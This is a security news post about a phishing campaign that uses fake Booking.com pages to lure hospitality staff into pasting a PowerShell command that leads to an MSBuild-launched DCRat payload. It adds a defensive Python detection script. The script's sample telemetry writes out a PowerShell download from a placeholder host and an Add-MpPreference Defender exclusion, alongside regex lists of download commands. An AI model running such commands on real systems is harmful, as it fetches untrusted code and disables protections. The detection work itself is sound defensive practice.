New Malware Campaign Targets Hospitality Sector
- Jan 13
Cybersecurity researchers have identified a multi-stage malware campaign aimed at hospitality organisations during the busy holiday season. The operation, tracked as PHALT#BLYX by Securonix, uses advanced social engineering techniques such as fake CAPTCHA prompts and simulated Blue Screen of Death errors to trick victims into manually executing malicious code.
The attack begins with phishing emails impersonating Booking.com, claiming urgent reservation cancellations and highlighting inflated room charges—often exceeding €1,000—to create panic. Clicking the link redirects victims to a convincing clone of the Booking.com website, which initiates the attack chain. Unlike earlier versions that relied on HTML application files and mshta.exe, this iteration abuses MSBuild.exe, a legitimate Microsoft utility, to compile and execute a malicious project file. This “living-off-the-land” technique helps the malware evade traditional endpoint security.
Victims are instructed to copy a PowerShell command from the clipboard into the Windows Run dialog. This command downloads the malicious project file, which MSBuild then executes. The final payload is a heavily obfuscated variant of DCRat, a remote access Trojan sold on underground forums, enabling keylogging, process injection, and secondary malware deployment.
Indicators such as Cyrillic debug strings and the use of DCRat suggest that Russian-speaking threat actors are behind the campaign. The phishing lures reference charges in Euros, pointing to a focus on European hospitality businesses. The attackers also implemented stealthy persistence methods, such as adding Windows Defender exclusions and using Internet Shortcut files for startup persistence.
The UK’s National Cyber Security Centre (NCSC) urges organisations to adopt a layered defence strategy. Employees should never paste commands prompted by websites and should be trained to recognise social engineering tactics. NCSC offers free resources such as its “Top Tips for Staff” e-learning programme to improve awareness. Organisations are advised to treat unexpected booking-related emails with caution and verify requests through official channels before clicking links. Monitoring for unusual use of trusted tools like MSBuild.exe and PowerShell is essential, alongside behavioural detection for living-off-the-land techniques. Strengthening phishing defences through multi-layered email security and filtering is also recommended. Finally, maintaining offline backups and following NCSC’s guidance on mitigating malware and ransomware attacks will help ensure resilience.
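The behaviours described above (a PowerShell download launched from the Run dialog, MSBuild compiling a project file from a user-writable directory, a Defender exclusion being added, and an Internet Shortcut landing in a Startup folder) can each be expressed as a simple detection rule over process-creation and file-creation telemetry. The following is an added example written for this page, not code from Securonix, the NCSC, or any product: it evaluates a handful of constructed log records against those rules and reports which records match. The tab-separated key=value record layout, the field names and every path and host in the sample data are assumptions made for the example.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample telemetry (not real logs). The tab-separated key=value
# layout and field names are assumptions made for this example; all user
# names, paths and hosts are placeholders.
SAMPLE_EVENTS = [
    # Benign: a developer building a project from a source checkout.
    "Type=ProcessCreate\tParent=C:\\Windows\\explorer.exe"
    "\tImage=C:\\Program Files\\Microsoft Visual Studio\\MSBuild\\Current\\Bin\\MSBuild.exe"
    "\tCommandLine=MSBuild.exe C:\\src\\app\\app.csproj",
    # Suspicious: PowerShell started by explorer.exe (as the Run dialog does) that downloads a file.
    "Type=ProcessCreate\tParent=C:\\Windows\\explorer.exe"
    "\tImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tCommandLine=powershell -c Invoke-WebRequest http://example.invalid/p -OutFile C:\\Users\\guest\\AppData\\Local\\Temp\\p.proj",
    # Suspicious: MSBuild compiling a project file that sits in a temp directory.
    "Type=ProcessCreate\tParent=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tImage=C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe"
    "\tCommandLine=MSBuild.exe C:\\Users\\guest\\AppData\\Local\\Temp\\p.proj",
    # Suspicious: a Defender exclusion being added from the command line.
    "Type=ProcessCreate\tParent=C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe"
    "\tImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tCommandLine=powershell Add-MpPreference -ExclusionPath C:\\Users\\guest\\AppData\\Roaming",
    # Suspicious: an Internet Shortcut (.url) dropped into the per-user Startup folder.
    "Type=FileCreate\tImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tTargetFilename=C:\\Users\\guest\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\update.url",
    # Benign: a user saving a shortcut to a web page on the desktop.
    "Type=FileCreate\tImage=C:\\Windows\\explorer.exe"
    "\tTargetFilename=C:\\Users\\guest\\Desktop\\intranet.url",
]

# Directories an unprivileged user can write to; a build tool reading its
# project from one of these is unusual outside a developer workstation.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|Public|ProgramData)\\", re.IGNORECASE)
# Common PowerShell download primitives.
DOWNLOAD_CMDLET = re.compile(
    r"Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b|DownloadString|DownloadFile|Net\.WebClient|Start-BitsTransfer",
    re.IGNORECASE,
)
STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.IGNORECASE)


def parse_event(line: str) -> Dict[str, str]:
    """Split one tab-separated key=value record into a dict (first '=' separates key and value)."""
    fields: Dict[str, str] = {}
    for part in line.split("\t"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields


def basename(path: str) -> str:
    """Lower-cased file name component of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the names of every detection rule the event matches."""
    hits: List[str] = []
    image = basename(event.get("Image", ""))
    parent = basename(event.get("Parent", ""))
    cmd = event.get("CommandLine", "")
    if event.get("Type") == "ProcessCreate":
        if image == "msbuild.exe" and USER_WRITABLE.search(cmd):
            hits.append("msbuild_project_from_user_writable_path")
        if image in ("powershell.exe", "pwsh.exe"):
            # The Run dialog is hosted by explorer.exe, so explorer.exe is the parent
            # of anything a user pastes into it.
            if parent == "explorer.exe" and DOWNLOAD_CMDLET.search(cmd):
                hits.append("powershell_download_from_explorer")
            if re.search(r"Add-MpPreference", cmd, re.I) and re.search(r"-Exclusion", cmd, re.I):
                hits.append("defender_exclusion_added")
    elif event.get("Type") == "FileCreate":
        target = event.get("TargetFilename", "")
        if target.lower().endswith(".url") and STARTUP_DIR.search(target):
            hits.append("internet_shortcut_in_startup")
    return hits


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Evaluate every record and return (record index, rule name) pairs for each match."""
    findings: List[Tuple[int, str]] = []
    for idx, line in enumerate(lines):
        for rule in evaluate(parse_event(line)):
            findings.append((idx, rule))
    return findings


if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"record {idx}: {rule}")
```

Each rule on its own produces some noise (developers do run MSBuild from odd places, and administrators do add Defender exclusions), so in practice these signals are most useful when correlated on one host within a short window: a download from the Run dialog followed by MSBuild reading a project from a temp directory and then a Defender exclusion is far more specific than any single event.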